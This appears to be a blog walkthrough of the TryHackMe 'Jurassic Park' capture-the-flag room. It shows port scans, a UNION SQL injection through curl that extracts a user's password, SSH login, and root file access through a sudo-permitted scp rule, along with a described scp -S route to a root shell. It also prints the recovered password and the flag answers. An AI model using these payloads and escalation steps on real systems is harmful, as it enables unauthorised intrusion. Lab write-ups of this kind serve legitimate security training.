18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Jurassic Park

Port scanning

Starting with a fast port scan to see which ports are open.

root@lab:~/THM/JurassicPark# nmap -T4 -sS -p- jurassic.park
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST
Nmap scan report for jurassic.park (10.10.10.170)
Host is up (0.036s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds

Then a more targeted scan of the two open ports, with version detection and the default scripts, to get more information.

root@lab:~/THM/JurassicPark# nmap -T4 -sS -sV -sC -p22,80 jurassic.park
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST
Nmap scan report for jurassic.park (10.10.10.170)
Host is up (0.032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9a:fb:a3:13:72:b3:53:59:94:b8:16:02:d1:d2:7e:32 (RSA)
|   256 76:32:44:a0:39:24:97:44:4f:43:7b:01:39:fb:cd:84 (ECDSA)
|_  256 33:7e:04:8e:db:96:06:af:20:90:a2:81:3d:45:db:8f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds

Not much information, apart from a misspelled "Jarassic Park" as the website title.

The main page shows the misspelled name again... maybe it's not a typo but a hint at JAR files?

In the source code there is a comment:

<!-- <video src="assets/theme.mp3" autoplay> -->

Some web enumeration shows an assets folder and a /delete page.

root@lab:~/THM/JurassicPark# dirsearch -u http://jurassic.park -e php -x 404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 207627

Error Log: /opt/tools/dirsearch/logs/errors-19-09-30_20-43-13.log

Target: http://jurassic.park

[20:43:13] Starting: 
[20:43:13] 200 -    1KB - /
[20:43:14] 301 -  315B  - /assets  ->  http://jurassic.park/assets/
[20:43:33] 200 -   65B  - /delete
[20:48:11] 403 -  301B  - /server-status

Task Completed
root@lab:~/THM/JurassicPark# curl jurassic.park/delete
New priv esc for Ubunut??

Change MySQL password on main system!

There is also a shop page, item.php, which takes an id parameter in the URI. When I replace the number with a single quote, I get a very nice result.

And at the bottom the text: YOU DIDN’T SAY THE MAGIC WORD! Try SqlMap.. I dare you..

But when entering a double quote I get a better result, namely an SQL error.

Before continuing with the SQLi, I first want to see which values of the parameter return something. The loop below only prints a separator when grep finds a body, so ids without a product show up as just the id line.

root@lab:~/THM/JurassicPark# for i in {1..25}; do echo -e "id=$i\n\n" && curl -s "http://jurassic.park/item.php?id=$i" | grep -A 10 '<body>' && echo -e '\n------------------------------------------------\n'; done
id=1


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Gold Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $500000</h3></br>
    <div class="alert alert-primary" role="alert"><b>4</b> of these packages have been sold in the last hour.</div></br>
    <h4>Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice!</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=2


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Bronse Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $250000</h3></br>
    <div class="alert alert-primary" role="alert"><b>11</b> of these packages have been sold in the last hour.</div></br>
    <h4>Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one!</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=3


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Basic Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $100000</h3></br>
    <div class="alert alert-primary" role="alert"><b>27</b> of these packages have been sold in the last hour.</div></br>
    <h4>Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=4


id=5


<body>
  <section class='black text-center'>
    <a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
    <h1>Development Package</h1></br>
  </section>
  <div class="container text-center">
    <h3>Price: $0</h3></br>
    <div class="alert alert-primary" role="alert"><b>0</b> of these packages have been sold in the last hour.</div></br>
    <h4>Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?</h4>
    </br><h4>Order yours quick by calling us!</h4>


------------------------------------------------

id=6


id=7


id=8

So id=5 returns something useful: a hint about which characters are filtered.

OK, so let's recap what we have so far.

There is a parameter which is vulnerable to SQLi, but there is some filtering in place: the Development Package text says the characters ' # DROP - username @ are blocked, and the "magic word" page is what you get when you hit the filter. I have sqlmap with WAF tamper scripts running in the background, but it has not found anything viable. So until I can let sqlmap dump the database for me, I have to do some manual work.

SQL Injection

#1 What is the SQL database called which is serving the shop information?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
park Package
#2 How many columns does the table have?

That's clear from the previous command: the UNION with five columns was accepted (a mismatched column count would have given an SQL error), so the original query selects 5 columns, and the second one is what ends up in the <h1>.

#3 Whats the system version?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
5.7.25-0ubuntu0.16.04.2 Package
#4 What is dennis’ password?

Because 'username' is filtered, I can't enumerate the obvious column and have to guess the table and column names a bit. After a little while I get a password out of a users table with a password column.

root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20from%20users" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
ih8dinos Package
#5 Locate and get the first flag contents.
root@lab:~/THM/JurassicPark# ssh dennis@jurassic.park
The authenticity of host 'jurassic.park (10.10.150.111)' can't be established.
ECDSA key fingerprint is SHA256:/qDcDUmBukzaryWv8jvW3cafeByJkfebR0UcVxD/wVE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jurassic.park,10.10.150.111' (ECDSA) to the list of known hosts.
dennis@jurassic.park's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

62 packages can be updated.
45 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

dennis@ip-10-10-150-111:~$ ls -lah
total 44K
drwxr-xr-x 3 dennis dennis 4.0K Sep 30 20:20 .
drwxr-xr-x 4 root   root   4.0K Feb 16  2019 ..
-rw------- 1 dennis dennis 1001 Feb 16  2019 .bash_history
-rw-r--r-- 1 dennis dennis  220 Feb 16  2019 .bash_logout
-rw-r--r-- 1 dennis dennis 3.7K Feb 16  2019 .bashrc
drwx------ 2 dennis dennis 4.0K Sep 30 20:20 .cache
-rw-rw-r-- 1 dennis dennis   93 Feb 16  2019 flag1.txt
-rw-r--r-- 1 dennis dennis  655 Feb 16  2019 .profile
-rw-rw-r-- 1 dennis dennis   32 Feb 16  2019 test.sh
-rw------- 1 dennis dennis 4.3K Feb 16  2019 .viminfo
dennis@ip-10-10-150-111:~$ cat flag1.txt 
Congrats on finding the first flag.. But what about the rest? :O

b89f2d69c56b9981ac92dd267f
#6 Whats the contents of the second flag?
dennis@ip-10-10-150-111:~$ find / -iname "flag*" -type f 2>/dev/null
/home/dennis/flag1.txt
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/vif-0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/usr/src/linux-aws-headers-4.4.0-1072/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-4.4.0-1072-aws/include/config/zone/dma/flag.h
/boot/grub/fonts/flagTwo.txt
dennis@ip-10-10-150-111:~$ cat /boot/grub/fonts/flagTwo.txt
96ccd6b429be8c9a4b501c7a0b117b0a
#7 Whats the contents of the third flag?
dennis@ip-10-10-150-111:~$ cat .bash_history 
Flag3:b4973bbc9053807856ec815db25fb3f1
#8 Whats the contents of the fourth flag?
dennis@ip-10-10-150-111:~$ cat .viminfo
> /tmp/flagFour.txt

But there is no /tmp/flagFour.txt. The creator of the room confirms this in the Discord chat.

#9 Whats the contents of the fifth flag?
dennis@ip-10-10-150-111:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-150-111.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dennis may run the following commands on ip-10-10-150-111.eu-west-1.compute.internal:
    (ALL) NOPASSWD: /usr/bin/scp
dennis@ip-10-10-150-111:~$ ls -ld /usr/bin/scp
-rwxr-xr-x 1 root root 80016 Nov  5  2018 /usr/bin/scp
dennis@ip-10-10-150-111:~$ cat test.sh
#!/bin/bash
cat /root/flag5.txt
test.sh hints at what to read, but it cannot be run as root. scp can: with sudo it runs as root, so it can copy /root/flag5.txt to a world-readable location (the -r is not needed for a single file, but harmless). Note that this rule allows more than reading files: scp's -S option names the program used to set up the connection, and under sudo that program runs as root, so a one-line script that execs a shell turns the same entry into a full root shell. For the flag, a plain copy is enough.

dennis@ip-10-10-150-111:~$ sudo scp -r /root/flag5.txt /tmp
dennis@ip-10-10-150-111:~$ ls -lah /tmp
total 40K
drwxrwxrwt  9 root root 4.0K Sep 30 20:25 .
drwxr-xr-x 23 root root 4.0K Sep 30 19:46 ..
-rw-r--r--  1 root root   33 Sep 30 20:25 flag5.txt
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .font-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .ICE-unix
drwx------  3 root root 4.0K Sep 30 19:46 systemd-private-eed490776f0c401db680b0c43a10f612-systemd-timesyncd.service-02qwMJ
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .Test-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .X11-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .XIM-unix
dennis@ip-10-10-150-111:~$ cat /tmp/flag5.txt
2a7074e491fcacc7eeba97808dc5e2ec
